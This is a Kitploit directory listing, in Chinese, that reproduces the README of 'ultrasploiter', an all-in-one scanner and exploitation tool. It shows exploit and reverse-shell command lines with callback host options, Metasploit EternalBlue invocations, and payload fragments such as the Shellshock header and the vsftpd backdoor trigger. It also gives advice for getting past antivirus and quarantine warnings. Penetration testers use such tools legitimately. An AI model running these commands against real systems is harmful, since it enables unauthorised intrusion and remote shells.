Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ultrasploiter — 一个单一二进制文件,将端口扫描器、完整的 Exploit-DB 索引(4.7 万条条目)以及可运行的漏洞利用模块整合为一个工具。使用 Rust 编写,可在 Linux、Windows 和 macOS 上运行。 | Kitploit
工具/GitLabGitLab/vqkro/ultrasploiter
渗透测试框架侦察漏洞扫描器漏洞利用框架网络映射端口扫描漏洞利用Web应用程序漏洞利用信息收集命令与控制红队Payload 开发
1013小时8分前尚未审核
GitLabvqkro/ultrasploiter

ultrasploiter

一个单一二进制文件,将端口扫描器、完整的 Exploit-DB 索引(4.7 万条条目)以及可运行的漏洞利用模块整合为一个工具。使用 Rust 编写,可在 Linux、Windows 和 macOS 上运行。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

UltraSploiter

扫描、匹配、利用——输入一个 IP,输出 shell。

一个单一二进制文件,将端口扫描器、完整的 Exploit-DB 索引以及一组可运行的漏洞利用模块整合到一个工具中。支持 Linux、Windows 和 macOS。

任务通常做法这里
发现主机上的服务nmapUltraSploiter scan <ip>
查找漏洞利用searchsploitUltraSploiter search <kw>
发动攻击msfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter 菜单


安装

最简单也是最好的方式就是直接下载预编译的二进制文件并运行。 无需安装,无依赖——一个自包含的文件。

从 Releases 页面 下载:

  • Windows — UltraSploiter-windows-x86_64.exe → 双击运行
  • Linux — UltraSploiter-linux-x86_64
  • macOS — 暂无预编译二进制文件;用一条命令构建(见下文)

提醒: 安全工具容易被标记。Windows SmartScreen 和杀毒软件很可能会警告或隔离该二进制文件——点击 更多信息 → 仍要运行,或者如果你打算长期使用,添加排除项。

Windows

双击 UltraSploiter.exe。菜单会打开。

如果 SmartScreen 警告未知发布者(对于任何未签名的二进制文件都会如此),点击 更多信息 → 仍要运行。

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

如果 Gatekeeper 阻止它(同样,任何未签名的二进制文件都会如此),要么右键点击 → 打开,要么一次性清除隔离标记:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

从源码构建

仅在你的平台没有二进制文件,或者你想修改它时才需要。需要 Rust 1.74+。

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 使用 stable-x86_64-pc-windows-gnu 工具链,它通过 MinGW 链接——所以你不需要 Visual Studio 或 MSVC。如果该工具链缺失,它会自动安装。如果你已经有 MSVC Build Tools,直接运行 cargo build --release 也可以。

Windows + GNU 提醒: windows-sys(由 tokio 引入)会调用 dlltool,而 dlltool 又会调用汇编器 as——但 rust-mingw 组件并不包含 as。build.ps1 会在 %~dp0tools\mingw64\bin 和 %USERPROFILE%\tools\mingw64\bin 中查找包含 as 的 MinGW bin 目录,找到后将其添加到 PATH 前面。如果你遇到 error calling dlltool,把 winlibs 构建放到那里即可。MSVC 工具链不受影响。


运行

不带参数运行会显示菜单:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

命令行

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

在 Linux/macOS 上,需要加 ./ 前缀(例如 ./UltraSploiter scan 10.0.0.5)。

扫描参数

参数含义
-p <spec>top(1000)、80,443、1-1024、-(全部)
-T0..-T5时序模板——从更慢/更安静到更快/更嘈杂
-sUUDP 探测扫描
-sV服务/版本检测(默认开启)
--no-banner跳过 banner 抓取
--json输出 JSON 到 stdout
-oX <file>nmap 风格 XML

扫描器是异步的(tokio):每个 -T 级别设置同时进行的 socket 数量(-T5 时最多 8000 个),因此它能在几秒内覆盖 nmap top-1000。每个“开放”都是完成的 TCP 握手,所以结果是精确的。

选项(-o key=value)

键使用者含义
lhost、lport反弹 shell 模块回调地址
rportWeb 模块覆盖 HTTP 端口
pathshellshock、struts、phpunit端点路径
user、passtomcat_manager管理器凭据
coresolr_rceSolr core 名称
filegrafana_lfi要读取的文件
ssh_pubkeyredis_unauth要写入 authorized_keys 的密钥
src、dstproftpd_modcopy复制源/目标
timeout全部socket 超时秒数

漏洞利用数据库

search 和 info 由完整的 Exploit-DB 索引——47,000+ 条目(与 searchsploit 使用的相同数据集)支持,已打包进二进制文件。当某个条目带有可运行模块实现的 CVE 时,info 会将两者关联起来:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

可运行模块(37 个)

模块CVE触发方式
vsftpd_234CVE-2011-2523:) 用户名 → 6200 端口上的 root bind shell
unrealircd_backdoorCVE-2010-2075通过 IRC 发送 AB; <cmd>
distcc_execCVE-2004-2687DIST 协议编译器参数
proftpd_modcopyCVE-2015-3306SITE CPFR/CPTO 文件复制
redis_unauth—CONFIG SET 写入密钥或 cron 条目
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638Content-Type 中的 OGNL
tomcat_putCVE-2017-12615PUT 一个 JSP webshell
tomcat_manager—通过 /manager 部署 WAR
elasticsearch_groovyCVE-2015-1427_search 中的 Groovy RCE
drupalgeddon2CVE-2018-7600Form API 渲染回调
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000未认证的 /script Groovy
solr_rceCVE-2019-17558stream.body 中的 Velocity 模板
grafana_lfiCVE-2021-43798插件路径遍历文件读取
webmin_backdoorCVE-2019-15107password_change.cgi 将值管道传入 shell
php_cgi_arg_injectionCVE-2012-1823通过查询字符串的 -d auto_prepend_file

每个模块都实现了非破坏性的 check() 和 run()。

目录模块(数据驱动)

这些是由 data/catalog.json 中的目录引擎运行的小型 JSON 配方。添加一个模块只需约 8 行数据,而不是新的源文件:

idCVE说明
CAT-F5-TMUI-LFICVE-2020-5902F5 BIG-IP TMUI 文件读取
CAT-F5-ICONTROL-BASHCVE-2021-22986F5 iControl REST 未认证 RCE
CAT-F5-ICONTROL-2022-1388CVE-2022-1388F5 iControl 认证绕过 RCE
CAT-PULSE-SECURE-LFICVE-2019-11510Pulse Secure VPN 文件读取
CAT-CITRIX-2019-19781CVE-2019-19781Citrix ADC 文件读取
CAT-APACHE-2449 / -RCECVE-2021-41773Apache 2.4.49 遍历 / mod_cgi RCE
CAT-APACHE-2450 / -RCECVE-2021-42013Apache 2.4.50 遍历 / mod_cgi RCE
CAT-VBULLETIN-2019-16759CVE-2019-16759vBulletin widget_php RCE
CAT-VBULLETIN-2020-17496CVE-2020-17496vBulletin 嵌套 widget RCE
CAT-NEXUS3-LFICVE-2024-4956Nexus Repository 3 路径遍历
CAT-FORTINET-FGTLANGCVE-2018-13379Fortinet SSL-VPN 会话文件读取
CAT-PHPMYADMIN-LFICVE-2018-12613phpMyAdmin 本地文件包含
CAT-MINIO-INFOCVE-2023-28432MinIO 环境/凭据泄露
CAT-SPRING-ACTUATOR-ENV—Spring Boot actuator 配置泄露
CAT-DOCKER-API—开放的 Docker Engine API
CAT-KUBELET-PODS—匿名 kubelet pod 列表
CAT-ETCD-KEYS—未认证的 etcd 键值存储
CAT-HADOOP-WEBHDFS—未认证的 WebHDFS 列表

引擎处理方法、头部、正文、{cmd} / {file} / {lhost} / {lport} 替换、路径感知的 URL 编码(斜杠在遍历时保持字面量,表单正文完全编码,JSON 保持原始)、成功标记、反弹 shell 处理器,以及通过 curl 实现的 HTTPS,因此 443 端口的配方无需在二进制文件中引入 TLS 依赖即可工作。

Metasploit 桥接

如果你已经安装了 Metasploit,msf 会直接传递给它:

UltraSploiter msf search eternalblue
UltraSploiter msf run exploit/windows/smb/ms17_010_eternalblue -o RHOSTS=10.0.0.5 -o LHOST=10.0.0.1

这样你就能从同一个界面使用 Metasploit 的完整模块集。原生模块无需安装 Metasploit 即可工作。

扩展

添加一个漏洞利用:

  1. src/modules/<your>.rs — 实现 Exploit trait(check、run)。
  2. 在 src/modules/mod.rs → build() 中注册它。
  3. 在 data/exploits.json 中添加一个带有匹配 "module" 字段的条目。

Exploit-DB 索引位于 data/exploitdb.csv;TCP 端口列表位于 data/top1000.txt;UDP 探测列表位于 data/top_udp.txt。

下载工具